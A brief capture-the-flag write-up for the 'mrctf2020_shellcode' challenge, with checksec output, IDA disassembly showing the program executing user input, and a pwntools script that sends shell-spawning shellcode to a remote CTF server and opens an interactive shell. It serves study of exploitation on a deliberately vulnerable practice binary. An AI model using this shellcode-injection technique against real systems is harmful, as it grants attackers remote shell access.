HugeH4rD

mrctf2020_shellcode

Ubuntu16.04

---

checksec

[*] '/home/zelas/Desktop/pwn/mrctf2020_shellcode/mrctf2020_shellcode'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled				//
    RWX:      Has RWX segments

IDA

main()

; Attributes: bp-based frame

; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near

buf= byte ptr -410h
var_4= dword ptr -4

; __unwind {
push    rbp
mov     rbp, rsp
sub     rsp, 410h
mov     rax, cs:stdin@@GLIBC_2_2_5
mov     esi, 0          ; buf
mov     rdi, rax        ; stream
call    _setbuf
mov     rax, cs:stdout@@GLIBC_2_2_5
mov     esi, 0          ; buf
mov     rdi, rax        ; stream
call    _setbuf
mov     rax, cs:stderr@@GLIBC_2_2_5
mov     esi, 0          ; buf
mov     rdi, rax        ; stream
call    _setbuf
lea     rdi, s          ; "Show me your magic!"
call    _puts
lea     rax, [rbp+buf]
mov     edx, 400h       ; nbytes
mov     rsi, rax        ; buf
mov     edi, 0          ; fd
mov     eax, 0
call    _read
mov     [rbp+var_4], eax
cmp     [rbp+var_4], 0
jg      short loc_11D6

loc11D6

loc_11D6:
lea     rax, [rbp+buf]
call    rax
mov     eax, 0

0x02

---

思路

输入字符[buf],长度大于0,则执行buf

0x03

---

exp

from pwn import *

context(log_level='debug', os='linux', arch='amd64')
io = remote('node4.buuoj.cn', 28388)
# io = process(['./mrctf2020_shellcode'])

shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()